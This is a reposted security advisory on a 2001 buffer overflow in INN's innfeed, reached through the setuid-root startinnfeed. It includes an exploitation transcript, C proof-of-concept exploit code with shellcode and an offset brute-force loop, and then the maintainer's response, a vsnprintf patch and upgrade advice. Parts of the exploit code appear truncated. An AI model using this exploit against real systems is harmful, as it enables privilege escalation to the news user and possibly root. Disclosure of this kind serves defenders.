



    Following is based on a  Defcom Labs Advisory def-2001-23 by  Alex
    Hernandez and Enrique A. Sanchez Montellano.  innfeed is a program
    that implements  the NNTP  protocol for  transerring news  between

    Due to no bounds checking on the innfeed program a buffer overflow
    occurs while using  the -c flag,  thus rendering complete  control
    of the stack.  And rendering news uid and gid.

    Due to  no bounds  checking on  the logOrPrint()  function on  the
    vsprint() a stack overflow occurs  thus rendering the stack.   The
    user then  is able  to gain  news id,  in wich  he can  the trojan
    binaries to gain further access to upgrade his priviledges.

    Users trusted to group id can gain further access to news uid thus
    gaining owner priviledges  on the files  and being able  to trojan
    them  in  some  cases.  And  if  root  runs  those binaries a root
    compromise might be posible.

    Offending code:

        vsprintf (buffer,fmt,ap) ;

    Example of exploitation:

        nahual@shell:~$ ls -al /usr/lib/news/bin/innfeed
        -r-xr-x---   1 news     news       213124 Jun 14  2000
        nahual@shell:~$ ls -al /usr/lib/news/bin/startinnfeed
        -r-sr-x---   1 root     news        40796 Jun 14  2000
        nahual@shell:~$ id
        uid=1001(nahual) gid=100(users) groups=100(users),13(news)
        nahual@shell:~$ ./x-innfeed
        [ + ] innfeed buffer overflow (passed to startinnfeed) [ + ]
        [ + ] Found by:

        [ + ] Alex Hernandez (
        [ + ] Enrique Sanchez ( ... Yes is just
        [ + ] Defcom Labs @ Spain ....
        [ + ] Coded by Enrique A. Sanchez Montellano (El Nahual)

        [ + ] Using address 0xbffff9e4
        [ + ] Starting exploitation ...

        bash$ id
        uid=9(news) gid=13(news) groups=100(users),13(news)

    Proof of concept code:


      Buffer overflow in innfeed being called from startinnfeed renders
    uid(news) gid(news), startinnfeed is suid root so I have to also check
    if I can manage to get root out of this ....

      Enrique A. Sanchez Montellano
      ( ... Yes is only

    #include <stdio.h>
    #include <unistd.h>
    #include <string.h>
    #include <stdlib.h>

    #define OFFSET  0
    #define ALIGN   0
    #define BUFFER  470

    // MANDRAKE, REDHAT, etc....

    #ifdef REDHAT
    /* optimized shellcode ;) (got rid of 2 bytes from aleph1's) */
    //static char shellcode[]=
    char shellcode[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /*setuid(0) */


    #ifdef SLACKWARE
    /* optimized shellcode for slackware 7.0 (non setuid(getuid()) shell) */
    static char shellcode[]=

    unsigned long get_sp(void) {
      __asm__("movl %esp, %eax");

    void usage(char *name) {
      printf("Usage: %s <offset> <align> <buffer>\n", name);
      printf("Defcom Labs @ Spain ...\n");
      printf("Enrique A. Sanchez Montellano (\n");

    int main(int argc, char **argv) {
      char *code;
      int offset = OFFSET;
      int align = ALIGN;
      int buffer = BUFFER;
      unsigned long addr;
      int i;

      if(argc > 1) offset = atoi(argv[1]);
      if(argc > 2) align = atoi(argv[2]);
      if(argc > 3) buffer = atoi(argv[3]);

      code = (char *)malloc(buffer);

      printf("[ + ] innfeed buffer overflow (passed to startinnfeed) [ + ]\n");
      printf("[ + ] Found by: \n\n[ + ] Alex Hernandez
    ( \n[ + ] Enrique Sanchez ( ... Yes
    is just\n");
      printf("[ + ] Defcom Labs @ Spain ....\n");
      printf("[ + ] Coded by Enrique A. Sanchez Montellano (El Nahual)\n\n");

      addr = get_sp() - offset;

      printf("[ + ] Using address 0x%x\n", addr);

      for(i = 0; i <= buffer; i += 4) {
       *(long *)&code[i] = 0x90909090;

      *(long *)&code[buffer - 4] = addr;
      *(long *)&code[buffer - 8] = addr;

      memcpy(code + buffer - strlen(shellcode) -8 - align, shellcode,

      printf("[ + ] Starting exploitation ... \n\n");

      // REDHAT, MANDRAKE ...
    #ifdef REDHAT
      execl("/usr/bin/startinnfeed", "/usr/bin/startinnfeed", "-c", code, NULL);

      // SLACKWARE
    #ifdef SLACKWARE
    "/usr/lib/news/bin/startinnfeed", "-c", code, NULL);

      return 0;

    --- ---

    while [ $L -lt 12000 ]
    echo $L
    L=`expr $L + 1`
    ./x-startinnfeed $L

    This exploit will not affect  most installed INN systems, and  is,
    *primarily*  a  documentation  issue  (although  there  are indeed
    security issues, the main one of which has already been  addressed
    in current versions of INN).

    If you have users other than the news user in the news group on  a
    system with INN  installed, this issue  affects you; read  on.  If
    you  don't,  this  issue  does  not  (unless  you  somehow  have a
    misinstalled startinnfeed).

    Above affects versions  of INN prior  to INN 2.3.0.   startinnfeed
    was rewritten in INN 2.3.0  and will no longer execute  unless run
    as the news  user (the only  user to which  it will then  setuid()
    to), making buffer overflows in innfeed irrelevant from a security

    This particular buffer overflow is nonetheless fixed as a  quality
    of implementation issue in the current CVS tree and that fix  will
    be in the next release (in a different way than the patch provided
    in this advisory,  since the change  recommended in this  advisory
    required vsnprintf).


    Defcom has issued a patch for the vulnerability:

    <       vsprintf (buffer,fmt,ap) ;
    >       vsnprintf (buffer,512,fmt,ap) ;

    This patch applies to innfeed/misc.c.

    The recomended action is to  upgrade to version 2.3.1 wich  is not
    vulnerable to this attack due that you have to be news to  execute
    the  script.   root  should  not  run  any  of this commands as an
    administrative task trusted users should do this.

    INN 2.4.0 when released will probably *not* continue the policy of
    installing configuration files  group-writeable by default,  since
    we  don't  believe  that  this  is  the  way most news servers are
    configured these days.